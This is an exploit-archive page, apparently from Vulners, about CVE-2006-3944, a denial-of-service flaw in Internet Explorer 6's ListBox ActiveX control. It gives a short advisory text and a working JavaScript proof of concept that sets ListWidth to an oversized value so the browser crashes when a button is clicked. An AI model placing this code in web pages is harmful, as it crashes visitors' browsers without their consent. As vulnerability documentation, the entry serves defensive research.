Microsoft Internet Explorer 6 - Multiple Object ListWidth Property Denial of Service Vulnerabilities
| Reporter | Title | Published | Views | Family All 3 |
|---|---|---|---|---|
| CVE-2006-3944 | 31 Jul 200623:00 | – | cve | |
| CVE-2006-3944 | 31 Jul 200623:00 | – | cvelist | |
| CVE-2006-3944 | 31 Jul 200623:04 | – | nvd |
source: https://www.securityfocus.com/bid/19113/info
Microsoft Internet Explorer is prone to a denial-of-service vulnerability.
This issue is triggered when an attacker convinces a victim user to visit a malicious website.
Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.
function Demo() {
// Forms.ComboBox.1 is also affected
var a = new ActiveXObject('Forms.ListBox.1');
// NULL dereference
a.ListWidth = 0x7ffffffe;
// Integer overflow exception
// a.ListWidth = 0x7fffffff;
}
</script>
Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Sep 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.1746